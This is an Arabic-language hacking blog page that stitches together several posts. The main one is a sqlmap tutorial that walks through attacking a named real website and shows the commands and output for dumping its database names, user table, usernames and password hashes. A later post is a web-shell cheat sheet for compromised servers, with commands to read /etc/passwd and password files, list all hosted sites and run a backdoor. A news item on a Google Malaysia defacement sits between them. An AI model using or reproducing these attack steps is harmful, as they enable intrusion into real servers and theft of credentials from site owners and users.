How To Uplaod Shell Via PhpMyAdmin

Fun to watch

by  Xhackertn


شرح اختراق مواقع بستعمال sqlmap


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
  الكل يعرف انه ثغرات sql
 من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column   | Type                      |
+----------+---------------------------+
| id_user  | int(10) unsigned zerofill |
| password | text                      |
| username | text                      |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username     |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password                         |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
اتمنى ان يعجبكم الشرح
وأي استفسار انا جاهز
والسلام عليكم ورحمة الله وبركاته
psyco-hacker
مشاهدة ممتعة
 

إختراق نطاق غوغل


إختراق نطاق غوغل ماليزيا

قام أحد قراصنة المجموعة الباكستانية madleets يطلق على نفسه اسم ''1337''باختراق أو بالأحرى تشويه الواجهة الرئيسية لغوغل ماليزيا قبل ساعات قليلة من الآن و ليس هناك سبب وراء هذا الإختراق. 
حيث عمد الهاكر في هجومه على طريقة تشويه المواقع عبرDNS Hijacking  فيبدو كأنه تم اختراق غوغل و هي طريقة ناجحة لتشويه المواقع وقد تم إعتمادها من قبل المجموعة الفلسطينية التي كانت مؤخرا وراء إختراق كل من AVG,AVIRA,WHATSAPP بالإضافة إلى موقع alexa.

و جدير بالذكر ان الهاكر ''1337'' قام قبل أسابيع قليلة باختراق غوغل كينيا و غوغل بروندي وقد  شارك في اختراق فروع أكبر الشركات العالمية مثل Twitter, Toyota, Orange, norton, oracle, ibm, cisco,  بسيطرته على محول النطاقات الرئيسي في دولة بروندي ، بالإضافة لاختراقه للبنك الرئيسي بأفغانستان  في شهر مارس .
و في حين كتابة هذا التقرير فإن غوغل قد قامت بإصلاح المشكل .
نطاقات غوغل المخترقة :www.google.my
www.google.com.my

How to find SQL injection in website


Tutorial By psyco-hacker


t00l: i wont share it :D only with my team :)








خدع جوجل ربما لم ترها من قبل


بسم الله الرحمان الرحيم

السلام عليكم ورحمة الله وبركاته


الكثير من الناس يستعملون محرك البحث جوجل لكن القليل منهم يعرفون هذهالخدع من جوجل التي سنراها في هذا الموضوع .

1- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ tilt ” واضغط Entrer .
خدع جوجل
2- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ do a barrel roll ” واضغط Entrer.

خدع جوجل


3- قم بالدخول لمحرك البحث Google واكتب العبارة التالية  “ zerg rush  ”  واضغط Entrer.

خدع جوجل


4-  قم بالدخول لمحرك البحث Google واكتب العبارة التالية“ Google Gravity”واضغط ضربة حظ او J'ai de la chance.

خدع جوجل


خدع جوجل


5- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “ Google Mirror ” واضغط ضربة حظ او J'ai de la chance.

خدع جوجل

6- قم بالدخول لمحرك البحث Google واكتب العبارة التالية “Google Terminal” واضغط ضربة حظ او J'ai de la chance.
خدع جوجل

ارجوا ان ينال الموضوع اعجابكم .

اوامر الشيل





بسم الله الرحمان الرحيم

مرحباً بكم زوار مدونة تونيزيا هاك




أوامر الضغط وفك الضغط 
مثـالالأمروظيفة الأمر
qzip failnameqzipzip  أمر الضغط بامتداد  
unzip failnameunzip zip امر فك الضغط بامتداد 
tar -zcf zz.tar dailytar -zcftar  أمر الضغط بامتداد 
tar -zxf zz.tartar -zxftar أمر فك الضغط بامتداد
tar -czvf file name.tar.gz file name.sqltar -czvf gz أمر ضغط الملف بامتدا
gzip -d file.gzgzip -d gz فك الضغط بامتداد 
tar -czvf file name.tar.gz file name.sqltar -czvfكيفية ضغط قاعدة البيانات
tar -zxvf file name.tar.gztar -zxvfكيفية فك قواعد البيانات 
tar -czvf /home/user/public_html/n3.tar.gz n3tar -czvf
أوامر الداخلية
مثـالالأمروظيفة الأمر
lslsاستعراض الملفات
lsls -laاستعراض الملفات والمجلدات المخفية والتصاريح
pwdpwdتحديد المكان علىالسيرفر
ls;pwd;اداة الربط بين الأوامر
wgetأمرالسحب
curl -o ./xxx.zip http://xxxx.com/xxx.zipcurl -o ./امر السحب الآخر
historyhistoryأمر معرفة جميع الأوامر التي نفذت بالشل
mkdir shuooonmkdirانشاء مجلد جديد
rm failnamermأمر الحذف
rm -r dirrm -rحذف مجلد بجميع الملفات
edit failnameeditأمر التعديل
whowhoامر التصلين على السيرفر
cdcdامر دخول المجلدات
cd ..cd ..امر العودة للخلف
mvmvامر اعادة التسمية
findfindامر البحث
././أمر تشغيل الباك دور
uname -auname -aأمر معرفة اصدار السيرفر
ls ftp.zip**امر يرمز للكل
man lsmanامر المساعدة
drwxrwxrwxchmod 777 filechmod أمر إعطاء التصريح
touch file.phptouch أمر انشاء ملف فارغ
gcc xxx.c -o xxx
usr/bin/perl  يبدأ الكود بهذه الكلة  لا يحتاج ترجمة
include يبدأ الكود بهذه الكلةترجمة وتشغيل فقطملفات السي تبدأ بــ
أوامر  الخارجية
مثالالأمروظيفة الأمر
cat /home/*/public_html/_vti_pvt/access.cnfcatعرض جميع المواقع التي على السيرفر
cat /home/*/public_html/_vti_pvt/service.pwdcatعرض جميع الباسووردات على السيرفر
cat /usr/local/apache/conf/httpd.confcatلمعرفة عرض مصدر السيرفر
find / -name httpd.conffindعرض المصدر
more /etc/userdomainsmore  CAT امر مشابة للأمر
pico /home/burst/public_html/index.htmlpico تحرير النصوص
vi /home/burst/public_html/index.htmlviامر تحرير به الكثير من المزايا لكنه اصعب من السابق
valiases  المهم نحددls -la /etc/valiaseslsمعرفة المواقع اللي على السيرفر مع اليوزر
ls /var/namedlsمعرفة جميع المواقع اللي على السيرفر
valiases  المهم نحددls /usr/local/psa/home/vhosts/lsمعرفة جميع المواقع على السيرفر
perl file.plperlتشغيل البيرل
cat /etc/passwdابحث عن bashcatامر استخراج حسابات الشل

إلى القاء في موضوع قادم

© Tunisia-Hack